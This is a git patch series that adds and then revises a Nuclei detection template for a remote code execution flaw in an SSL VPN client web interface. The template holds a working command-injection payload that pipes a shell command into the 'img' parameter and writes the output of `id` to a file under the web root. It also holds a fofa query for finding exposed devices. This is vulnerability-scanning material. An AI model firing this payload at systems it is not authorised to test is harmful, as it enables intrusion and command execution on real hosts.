From a44a955e3dc19b0e78de22b04f683d8987dacdda Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sat, 9 Dec 2023 15:36:59 +0530
Subject: [PATCH 1/2] Create sslvpn-client-rce.yaml

---
 .../other/sslvpn-client-rce.yaml              | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 http/vulnerabilities/other/sslvpn-client-rce.yaml

diff --git a/http/vulnerabilities/other/sslvpn-client-rce.yaml b/http/vulnerabilities/other/sslvpn-client-rce.yaml
new file mode 100644
index 0000000000..ef5d1e6f39
--- /dev/null
+++ b/http/vulnerabilities/other/sslvpn-client-rce.yaml
@@ -0,0 +1,35 @@
+id: sslvpn-client-rce
+
+info:
+  name: SSL VPN Client - Remote Code Execution
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://github.com/server2565543706/Poc/blob/master/POC/anquantongsha.py
+    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/security_products_rce.py
+  metadata:
+    max-request: 1
+    verified: true
+    fofo-query: body="/webui/images/default/default/alert_close.jpg"
+  tags: sslvpn,rce,intrusive
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60id%60%20|tee%20/usr/local/webui/sslvpn/{{filename}}.txt"
+      - "{{BaseURL}}/sslvpn/{{filename}}.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_2
+        regex:
+          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'
+
+      - type: word
+        part: header_2
+        words:
+          - 'text/plain'

From 91bbf07d4d3a9620be75a66201266f14a5181179 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Dec 2023 12:48:29 +0530
Subject: [PATCH 2/2] Update sslvpn-client-rce.yaml

---
 http/vulnerabilities/other/sslvpn-client-rce.yaml | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)

diff --git a/http/vulnerabilities/other/sslvpn-client-rce.yaml b/http/vulnerabilities/other/sslvpn-client-rce.yaml
index ef5d1e6f39..ed2717f572 100644
--- a/http/vulnerabilities/other/sslvpn-client-rce.yaml
+++ b/http/vulnerabilities/other/sslvpn-client-rce.yaml
@@ -10,17 +10,21 @@ info:
   metadata:
     max-request: 1
     verified: true
-    fofo-query: body="/webui/images/default/default/alert_close.jpg"
+    fofa-query: body="/webui/images/default/default/alert_close.jpg"
   tags: sslvpn,rce,intrusive
 
 variables:
   filename: "{{to_lower(rand_text_alpha(5))}}"
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60id%60%20|tee%20/usr/local/webui/sslvpn/{{filename}}.txt"
-      - "{{BaseURL}}/sslvpn/{{filename}}.txt"
+  - raw:
+      - |
+        GET /sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60id%60%20|tee%20/usr/local/webui/sslvpn/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /sslvpn/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers: